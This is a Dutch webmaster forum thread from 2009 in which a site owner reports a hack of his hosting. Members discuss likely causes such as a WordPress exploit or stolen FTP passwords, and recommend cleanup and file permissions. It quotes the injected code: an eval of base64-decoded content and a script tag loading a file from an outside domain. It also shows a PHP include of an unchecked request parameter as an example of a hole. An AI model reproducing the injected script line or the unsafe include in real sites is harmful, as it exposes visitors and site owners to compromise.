login  Naam:   Wachtwoord: 
Registreer je!
 Forum

Hack

Offline prienstra - 14/10/2009 08:48 (laatste wijziging 14/10/2009 08:48)
Avatar van prienstraMySQL interesse Beste mensen,

Vanacht zijn er in bestanden op de ftp server (vooral de index.php en .js bestanden) het volgende geplaatst:

eval(base64_decode('blablabla'));
en
<script src=http://polynovepole.com.ua/player/cms_manage_users.php ></script>

Wat kan hiervan de oorzaak zijn:
- Sql injection
- mappen (op server) chmod op 888
- Cross-site scripting (xss)

17 antwoorden

Gesponsorde links
Offline ArieMedia - 14/10/2009 09:12
Avatar van ArieMedia Gouden medaille

PHP ver gevorderde
Wat is de vraag nu?

SQL-Injection, alleen als je hele pagina's uit je database haalt.. dan wel
Mappen op server chmod, als je een uploadscript hebt.. ja, dan kan dat

xss is het meest voorkomende geval, dus ik zou hem op deze gokken..

Als je dingen hebt zoals
  1. if(isset($_GET['p'])) {
  2. include $_GET['p'];
  3. }

Dan is het heel simpel om hier mijn bestand te gaan includen :-)
Heb er een poos terug een klein artikel over geschreven : Veilige includes
Offline prienstra - 14/10/2009 09:44
Avatar van prienstra MySQL interesse Ik heb al meer gevonden:

Het is een virus, want het bestand gifimg.php is ook op de server geplaatst.

http://www.tech...-the-loose/

Heeft iemand hier ervaring mee?
Offline ArieMedia - 14/10/2009 09:52
Avatar van ArieMedia Gouden medaille

PHP ver gevorderde
prienstra schreef:
Ik heb al meer gevonden:

Het is een virus, want het bestand gifimg.php is ook op de server geplaatst.

http://www.tech...-the-loose/

Heeft iemand hier ervaring mee?
Als ik jou was zal ik je website tijdelijk down halen en de backup erop zetten als je hosting-aanbieder het virus er af heeft gehaald.
Offline prienstra - 14/10/2009 10:07
Avatar van prienstra MySQL interesse Zit het virus bij de hosting?
Zit dat niet op mijn eigen computer? Iik heb het ftp wachwoord veranderd, en idd de backup terug geplaatst.
Offline ArieMedia - 14/10/2009 10:11
Avatar van ArieMedia Gouden medaille

PHP ver gevorderde
prienstra schreef:
Zit het virus bij de hosting?
Zit dat niet op mijn eigen computer? Iik heb het ftp wachwoord veranderd, en idd de backup terug geplaatst.
Als je het niet op andere websites merkt en je dmv een backup terugplaatsen het virus vervangt op jou website dan staat het op de hosting van je en niet op je pc. (Annuwel hij zich misschien wel ten download kan aanbieden waardoor je hem nu wel bezit)
Offline jaronneke - 14/10/2009 10:24
Avatar van jaronneke MySQL interesse Offtopic:

Arie jij bent echt de enigste die het woord :Annuwel : gebruikt ?:P
Offline prienstra - 14/10/2009 10:24
Avatar van prienstra MySQL interesse Ik vermoed dat het met wordpress te maken heeft.

Toen ik nog een blog had, was het de eerste keer van zo'n hack (op 2 site's van mij. Beide bij andere hosting).
Ik heb na die hack mijn bloggen verwijderd, maar nooit mijn ftp wachtwoord veranderd.
Ik denk dat die "hackers" de ftp-login en wachtwoord opgeslagen hebben in hun database. En daardoor vannacht weer toegang hadden.
Nu zijn de ftp wachtwoorden gewijzigd, en heb de auto save password functie in ws_ftp uitgeschakeld.
Offline ArieMedia - 14/10/2009 10:57 (laatste wijziging 14/10/2009 11:05)
Avatar van ArieMedia Gouden medaille

PHP ver gevorderde
prienstra schreef:
Ik vermoed dat het met wordpress te maken heeft.

Toen ik nog een blog had, was het de eerste keer van zo'n hack (op 2 site's van mij. Beide bij andere hosting).
Ik heb na die hack mijn bloggen verwijderd, maar nooit mijn ftp wachtwoord veranderd.
Ik denk dat die "hackers" de ftp-login en wachtwoord opgeslagen hebben in hun database. En daardoor vannacht weer toegang hadden.
Nu zijn de ftp wachtwoorden gewijzigd, en heb de auto save password functie in ws_ftp uitgeschakeld.
Dan hopen we maar dat het zo opgelost is he 

@jaronneke

Geen flauw idee, annuwel ik het niet zo vaak langs zie komen 
Wat een raar "woord" eigenlijk.

Edit: Vetcool, als je op Annuwel googled krijg je posts van mij xD
Offline jaronneke - 14/10/2009 11:16 (laatste wijziging 14/10/2009 11:51)
Avatar van jaronneke MySQL interesse Dat komt omdat het geen Nederlands is, je bedoelt:
"alhoewel" 
Offline Gerard - 14/10/2009 11:52
Avatar van Gerard Ouwe rakker Het lijkt er inderdaad op dat het gaat om die Wordpress exploit. In het artikel wat je linkt wordt ook aangegeven dat de FTP credentials worden opgezocht om zodoende meer websites te kunnen besmetten.

Mocht dit het niet zijn dan zou ik even contact opnemen met je hosting provider. Er is namelijk ook een exploit actief voor de FTP service waar DirectAdmin servers gebruik van maken. Hier hebben wij op Sitemasters ook last van gehad in het verleden.
Offline prienstra - 14/10/2009 12:00
Avatar van prienstra MySQL interesse Gerard, bedankt voor je reactie. Ik ga erop letten. Ik hoop dat het over is.
Offline Thijs - 14/10/2009 12:08
Avatar van Thijs Crew hosting De exploit waar Gerard naar referent is een probleem met je FTP programma waar alle wachtwoorden in zijn opgeslagen. Een hacker kan d.m.v. bijvoorbeeld een trojan op je PC deze wachtwoord raadplegen en gebruiken om bestanden up te loaden naar je hosting account. In dit geval is dat dus een abuse op je eigen PC.
Offline Gerard - 14/10/2009 15:29
Avatar van Gerard Ouwe rakker Ik had het eigenlijk over één van de verschillende exploits die er zijn voor ProFTPD 1.3.1.
Offline Koen - 14/10/2009 16:45
Avatar van Koen PHP expert Hoe kan je de mode van een bestand in godsnaam op 888 zetten?
Offline prienstra - 14/10/2009 18:36 (laatste wijziging 14/10/2009 18:44)
Avatar van prienstra MySQL interesse op welke chmod moet ik een map zetten waarnaar toe geupload wordt via php en via cronjobs?

Ik heb nu de mappen op 777.
Offline Aar - 14/10/2009 21:38
Avatar van Aar PHP interesse 755
Offline Mroseboom - 22/10/2009 16:41
Avatar van Mroseboom Lid Huh mappen 755 zo als aar zij
Bestanden 644

Groetjes
Gesponsorde links
Dit onderwerp is gesloten.
Actieve forumberichten
© 2002-2024 Sitemasters.be - Regels - Laadtijd: 0.202s